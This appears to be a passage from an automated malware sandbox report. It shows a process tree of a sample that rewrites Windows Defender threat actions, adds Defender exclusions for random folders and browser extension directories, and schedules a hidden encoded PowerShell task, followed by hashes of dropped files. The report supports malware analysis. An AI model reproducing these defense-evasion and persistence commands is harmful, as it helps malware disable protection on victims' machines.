\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:1908
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1272
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2532
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2540
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2208
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4296
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1612
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2992
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1564
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4000
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3532
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2208
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1408
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4004
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1440
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3160
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1564
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4788
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4432
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3628
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4388
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2160
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JqMoIWPtRqoDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JqMoIWPtRqoDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KuTytnbkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KuTytnbkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UotyJsAgSFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UotyJsAgSFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iyzAqDqghgpU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iyzAqDqghgpU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dTRdFhcsEOtGTQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dTRdFhcsEOtGTQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gtigoJAOxebpSqst\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gtigoJAOxebpSqst\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:3984
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:323⤵PID:944
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:324⤵PID:4344
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:643⤵PID:1236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:323⤵PID:1540
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:643⤵PID:2020
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:323⤵PID:2960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:643⤵PID:1720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:323⤵PID:1928
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:643⤵PID:4456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:323⤵PID:344
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:643⤵PID:4208
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dTRdFhcsEOtGTQVB /t REG_DWORD /d 0 /reg:323⤵PID:1872
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dTRdFhcsEOtGTQVB /t REG_DWORD /d 0 /reg:643⤵PID:964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4124
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2120
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4296
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2616
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH /t REG_DWORD /d 0 /reg:323⤵PID:876
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH /t REG_DWORD /d 0 /reg:643⤵PID:1928
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gtigoJAOxebpSqst /t REG_DWORD /d 0 /reg:323⤵PID:4060
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gtigoJAOxebpSqst /t REG_DWORD /d 0 /reg:643⤵PID:1348
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDjbebkHa" /SC once /ST 08:33:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3728 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDjbebkHa"2⤵PID:2900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3404
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
4.1MB
MD519f09a85eed41fceb243d08287bbc2c4
SHA1d5083aa6a0c64064053657b2b15f0b215fbbfeae
SHA25694b3e0aab4f848ef18e3a622cbf33c6b9f96efa61007f88a6454cbddbec79842
SHA51218e4f5ada504294469e80c2750140cbe0da4486b03846ad4b03fd9aa491833ec5c166338d9a70810aefed3ec2146ccc32f3c26c1e3347fc3faf46e5c539e3908
-
Filesize
4.1MB
MD505cc298eb7e32124eecaad2e3a66ac01
SHA134f4d568b12f55cf2dac384e1a2e5a0217531188
SHA25654cee41fc65af8833dff9c232a6065094bbd4a9fd5addd1dc3af64ec73a95523
SHA512cec4b325930413f1564b36845435451e0500e89a1b3487179649edf5b5ae2b43c88f2abbb5ce3ecc1a09b1c1d78102114751bd5409f28ed3a85952c37dabde70
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD5a6ea7bfcd3aac150c0caef765cb52281
SHA1037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23
-
Filesize
6.4MB
MD57cd17d00c4a696a4d641661855667a43
SHA15362473747a83e986738796b1cd6078a60a523c1
SHA256c5ec6e9d74dadb1a705d6558e3bf5cc872bef84f3f66d4decac90bad1de52522
SHA51268edbee61d2754452ec179fa6f3213d9d6988c6f889967cb11edbf76fb189c91734e40c2b7785d865c9c0ce4b63ee77159b87774d3c6fd91987ac908878727c3
-
Filesize
6.3MB
MD57f3b2f042a4a028047325e274c0a7b50
SHA12a3a0786b40633d88ac1af7aca3c4e0c688cf514
SHA2564b3f9faa580badad4ed118081455201bed3435e3df1a626c15608331d710f96d
SHA512937007cfcdad74bc89ce991fd071fd0f42c785360c5e44716cd2bfb78329d95b79095da41c78725f9832464c984ab5ded81ad3791fad71f891620ae2da46a2ad
-
Filesize
5.6MB
MD58cc6e4947b0e5b48dced5420f0ac482a
SHA127a69a9697581b16078bce0c689bcfee18489c72
SHA256ab27e7a5e26fadb02309dd24c068e66ebbbbf603e0114c63dfd4a8233cd8b6a3
SHA51239ce7437d8fbc0f9b38d9618a03166291d74adfb9471b7f535b510b95eae60fb78ac28cb48d2deda52b34b905ca1bb5881fda4654fafd07b5891ebc8bd54039a
-
Filesize
1.6MB
MD509c1088ad6841eb705e5e07e8d32b1d8
SHA1bee0b7c0731249c1e65adc652440d8c8c73c805a
SHA25694051dc2550748beef42be4734ec9fcdbc380766c5fb017693f8d7c72d17766c
SHA512e26c89045b6c6591632d9088f68b5bebad66a0aa501af86a8c10f7a094ed1567677ce53b2ddea6efd89ec0764e5e5d2e7ae53672ddcd4b9d77cd2523389d25b5
-
Filesize
106KB
MD5fe380780b5c35bd6d54541791151c2be
SHA17fe3a583cf91474c733f85cebf3c857682e269e1
SHA256b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53
SHA512ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c
-
Filesize
742KB
MD5544cd51a596619b78e9b54b70088307d
SHA14769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719
-
Filesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA5126fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD57a6e2a7b990e28af4f22b0c5b14dd8a1
SHA1ef6d9aa518dceeb5957dc374206de96baed5cb8f
SHA2560849d1bb39c4d11a8fac73f78040af913dc036488e2d452e70650643b2c54c87
SHA512dc5db3db71d79586d050cc46e3faea3a49f5be5041548f541ab50e14162473aa19990fa4b8ebf966e3b1a46ca1abf3347b4c1bacd6f31f2ab3f8b6e411859aca
-
Filesize
680KB
MD543a50e24c92adb66cf02c3e4bb2e7d60
SHA18f8fea4b33b297369e7f9a4d3834e8ff4a092f74
SHA2561e467d744a0c5d275911c4823e3c96fcb1aabd1bbcc8a10e0ae0bbd327348f64
SHA512dd828a5011303b7d454f463766482eb02b3c7b54fb64f023bff965b4feed462d77904d157a56ec67297c69c54b1f9e74b83e92c53827876ac51781d1bc266aad
-
Filesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
Filesize
2.4MB
MD5598f2e73c39dbbf7a678c69f93f4e275
SHA17b55f50c9361807aa363a813198cdb980a41f42a
SHA256e9ddcd8c9cfee2bfa932ae52e5a9c4757ee80443710c68b8fc37de7d315f14b6
SHA5129bbc4eeee851f19a3f17e54bcb1cebefb9a19257eb7c36ec2609654052e8c9225edbe98f4d9b3fd5667967ca081d974fd90f06d615b71e7534e4431121b8bc49
-
Filesize
244KB
MD52caa34244dd6726f37dbccc7fe9b59fd
SHA10ec728e4614ae0f3ae5db4ed255a1a344d654659
SHA2565bde316bb02a4d1c0e5530093c04f48e6bb862a828f154b5ad2a19c3a032937d
SHA5122a471bf75e21b6637839626f25668e03fd60c7bdd2f11b838c3842999e6b615a26c6bd1bcf3ecdcdae37a6ce11a046e7590194c8fdc40aef2ab44854238669b2
-
Filesize
244KB
MD529877a58ae0451a99c87ad731fab8cc2
SHA1bde239b652c1610f7e37abd386866721bd9c8979
SHA2569ed4c719905536af3c9383e619d11173daa97d582654072d53ded90c2d032e10
